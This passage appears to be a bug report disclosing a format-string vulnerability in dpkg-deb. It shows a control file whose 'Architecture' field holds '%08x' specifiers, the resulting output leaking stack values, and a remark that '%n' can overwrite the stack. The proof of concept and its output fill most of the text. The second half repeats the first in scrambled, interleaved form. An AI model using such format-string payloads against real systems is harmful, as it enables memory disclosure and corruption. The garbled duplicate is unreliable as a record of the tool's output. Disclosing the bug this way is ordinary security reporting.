and run --build, it will print five parameters from the stack.
# ./dpkg-deb --build /var/tmp/ok/
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 2 package 'backup:016b0150.00449f58.00000001.00000001.00000018':
'�D' is not a valid architecture name: %08x.%08x.%08x.%08x.%08x
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 4 package 'backup:00449077.00449af0.00000001.00000001.01bb5790':
missing maintainer
dpkg-deb: error: parsing file '/var/tmp/ok//DEBIAN/control' near line 4 package 'backup:00449082.00449af0.00000001.00000001.01bb5790':
missing version
This can also be used to overwrite/rewrite the stack, using %n, too.
I think that this is a security bug.
If you make the 'control' file have
Architecture: %08x.%08x. %08x.%08x. %08x
and run --build, it will print five parameters from the stack.
# ./dpkg-deb --build /var/tmp/ok/ ok//DEBIAN/ control' near line 2 package 'backup: 016b0150. 00449f58. 00000001. 00000001. 00000018' : %08x.%08x. %08x ok//DEBIAN/ control' near line 4 package 'backup: 00449077. 00449af0. 00000001. 00000001. 01bb5790' : ok//DEBIAN/ control' near line 4 package 'backup: 00449082. 00449af0. 00000001. 00000001. 01bb5790' :
dpkg-deb: warning: parsing file '/var/tmp/
'�D' is not a valid architecture name: %08x.%08x.
dpkg-deb: warning: parsing file '/var/tmp/
missing maintainer
dpkg-deb: error: parsing file '/var/tmp/
missing version
This can also be used to overwrite/rewrite the stack, using %n, too.